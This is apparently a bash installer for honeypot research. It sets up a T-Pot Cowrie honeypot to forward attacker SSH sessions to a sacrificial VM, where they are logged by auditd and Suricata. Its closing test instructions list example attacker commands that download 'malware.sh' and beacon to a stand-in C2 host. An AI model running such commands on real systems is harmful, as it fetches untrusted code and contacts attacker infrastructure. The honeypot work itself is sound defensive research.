#!/bin/bash
#
# Install Cowrie Proxy Backend for T-Pot
#
# This configures your existing T-Pot Cowrie to forward sessions
# to a sacrificial VM instead of using the fake shell.
#
# Prerequisites:
# 1. Sacrificial VM is set up and running (run setup-sacrificial-vm.sh on it)
# 2. T-Pot is running
# 3. Network connectivity between T-Pot and sacrificial VM
#

set -e

SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
SACRIFICIAL_VM_IP="${1:-192.168.40.20}"
SACRIFICIAL_VM_USER="${2:-honeypot}"
SACRIFICIAL_VM_PASS="${3:-honeypot_backend_pass_change_me}"

RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
NC='\033[0m'

echo -e "${BLUE}"
echo "╔════════════════════════════════════════════════════════════════╗"
echo "║     Cowrie Proxy Backend Installation for T-Pot               ║"
echo "║     Forward SSH sessions to sacrificial VM                     ║"
echo "╚════════════════════════════════════════════════════════════════╝"
echo -e "${NC}"

echo ""
echo "Configuration:"
echo "  Sacrificial VM:  $SACRIFICIAL_VM_IP"
echo "  Backend User:    $SACRIFICIAL_VM_USER"
echo ""

# ============================================================================
# Step 1: Detect T-Pot installation
# ============================================================================
echo -e "${BLUE}[1/5] Detecting T-Pot installation...${NC}"

# Find T-Pot directory
TPOT_DIR=""
for path in /opt/tpot /data/tpot ~/tpot; do
    if [ -d "$path" ]; then
        TPOT_DIR="$path"
        break
    fi
done

if [ -z "$TPOT_DIR" ]; then
    echo -e "${YELLOW}T-Pot directory not found. Enter path:${NC}"
    read -r TPOT_DIR
fi

if [ ! -d "$TPOT_DIR" ]; then
    echo -e "${RED}Error: T-Pot directory not found at $TPOT_DIR${NC}"
    exit 1
fi

echo -e "${GREEN}  ✓ Found T-Pot at: $TPOT_DIR${NC}"

# Find Cowrie container
COWRIE_CONTAINER=$(docker ps --format '{{.Names}}' | grep -i cowrie | head -1)
if [ -z "$COWRIE_CONTAINER" ]; then
    echo -e "${RED}Error: Cowrie container not running${NC}"
    exit 1
fi

echo -e "${GREEN}  ✓ Found Cowrie container: $COWRIE_CONTAINER${NC}"

# ============================================================================
# Step 2: Test connectivity to sacrificial VM
# ============================================================================
echo -e "${BLUE}[2/5] Testing connectivity to sacrificial VM...${NC}"

if ping -c 1 -W 2 "$SACRIFICIAL_VM_IP" &>/dev/null; then
    echo -e "${GREEN}  ✓ Sacrificial VM is reachable${NC}"
else
    echo -e "${YELLOW}  ⚠ Cannot ping sacrificial VM - continuing anyway${NC}"
fi

# Test SSH (from host, not container)
if timeout 5 bash -c "echo | nc -v $SACRIFICIAL_VM_IP 22 2>&1 | grep -q 'SSH'"; then
    echo -e "${GREEN}  ✓ SSH is running on sacrificial VM${NC}"
else
    echo -e "${YELLOW}  ⚠ SSH not detected on $SACRIFICIAL_VM_IP:22${NC}"
    echo "    Make sure the sacrificial VM is set up and running"
fi

# ============================================================================
# Step 3: Backup existing Cowrie config
# ============================================================================
echo -e "${BLUE}[3/5] Backing up existing configuration...${NC}"

BACKUP_DIR="$SCRIPT_DIR/backup-$(date +%Y%m%d-%H%M%S)"
mkdir -p "$BACKUP_DIR"

# Get Cowrie config from container
docker cp "$COWRIE_CONTAINER:/cowrie/cowrie-git/etc/cowrie.cfg" "$BACKUP_DIR/" 2>/dev/null || \
docker cp "$COWRIE_CONTAINER:/cowrie/cowrie-git/cowrie.cfg" "$BACKUP_DIR/" 2>/dev/null || \
echo "  No existing config found to backup"

echo -e "${GREEN}  ✓ Backup saved to: $BACKUP_DIR${NC}"

# ============================================================================
# Step 4: Generate and install proxy configuration
# ============================================================================
echo -e "${BLUE}[4/5] Generating proxy configuration...${NC}"

# Create the config file with actual values
cat > /tmp/cowrie-proxy-backend.cfg << EOF
#
# Cowrie Proxy Backend Configuration
# Generated by install-cowrie-proxy.sh
# Forwards sessions to: $SACRIFICIAL_VM_IP
#

[backend_pool]
enabled = true
save_state = false
recycle_period = 600

[proxy]
backend = simple

# Sacrificial VM connection details
backend_ssh_host = $SACRIFICIAL_VM_IP
backend_ssh_port = 22
backend_user = $SACRIFICIAL_VM_USER
backend_pass = $SACRIFICIAL_VM_PASS

# Also available: key-based auth
# backend_ssh_key = /etc/cowrie/backend_key

# Pool settings
pool_max_size = 10
pool_timeout = 600

[ssh]
version = SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6
enabled = true

[telnet]
enabled = false

[output_jsonlog]
enabled = true
logfile = \${honeypot:log_path}/cowrie.json
epoch_timestamp = false

[output_textlog]
enabled = true
logfile = \${honeypot:log_path}/cowrie.log
EOF

# Create directory for custom configs in T-Pot data
COWRIE_DATA="$TPOT_DIR/data/cowrie"
mkdir -p "$COWRIE_DATA/etc"

# Copy to T-Pot data directory (persists across container restarts)
cp /tmp/cowrie-proxy-backend.cfg "$COWRIE_DATA/etc/cowrie.cfg.local"

# Copy into running container
docker cp /tmp/cowrie-proxy-backend.cfg "$COWRIE_CONTAINER:/cowrie/cowrie-git/etc/cowrie.cfg.local"

echo -e "${GREEN}  ✓ Proxy configuration generated${NC}"

# ============================================================================
# Step 5: Restart Cowrie
# ============================================================================
echo -e "${BLUE}[5/5] Restarting Cowrie with proxy backend...${NC}"

docker restart "$COWRIE_CONTAINER"

sleep 5

if docker ps | grep -q "$COWRIE_CONTAINER"; then
    echo -e "${GREEN}  ✓ Cowrie restarted successfully${NC}"
else
    echo -e "${RED}  ✗ Cowrie failed to start. Rolling back...${NC}"
    if [ -f "$BACKUP_DIR/cowrie.cfg" ]; then
        docker cp "$BACKUP_DIR/cowrie.cfg" "$COWRIE_CONTAINER:/cowrie/cowrie-git/etc/cowrie.cfg"
        docker restart "$COWRIE_CONTAINER"
    fi
    exit 1
fi

# ============================================================================
# Verify
# ============================================================================
echo ""
echo -e "${GREEN}╔════════════════════════════════════════════════════════════════╗${NC}"
echo -e "${GREEN}║     Cowrie Proxy Backend Installed!                            ║${NC}"
echo -e "${GREEN}╚════════════════════════════════════════════════════════════════╝${NC}"
echo ""
echo "How it works now:"
echo ""
echo "  1. Attacker connects to T-Pot Cowrie (port 22 or 2222)"
echo "  2. Cowrie logs the credentials"
echo "  3. Cowrie forwards the session to $SACRIFICIAL_VM_IP"
echo "  4. Attacker gets a REAL shell on the sacrificial VM"
echo "  5. All commands logged by auditd on the VM"
echo "  6. All network traffic captured by Suricata"
echo ""
echo "Test it:"
echo "  ssh root@<your-tpot-ip> -p 2222"
echo "  Password: root"
echo ""
echo "  Then try:"
echo "    wget http://example.com/malware.sh"
echo "    curl http://c2-server.evil/beacon"
echo ""
echo "View logs:"
echo "  Cowrie:    docker logs -f $COWRIE_CONTAINER"
echo "  VM audit:  ssh $SACRIFICIAL_VM_IP 'tail -f /var/log/audit/audit.log'"
echo "  Suricata:  ssh $SACRIFICIAL_VM_IP 'tail -f /var/log/suricata/eve.json'"
echo ""
echo "Rollback:"
echo "  docker cp $BACKUP_DIR/cowrie.cfg $COWRIE_CONTAINER:/cowrie/cowrie-git/etc/"
echo "  docker restart $COWRIE_CONTAINER"
echo ""
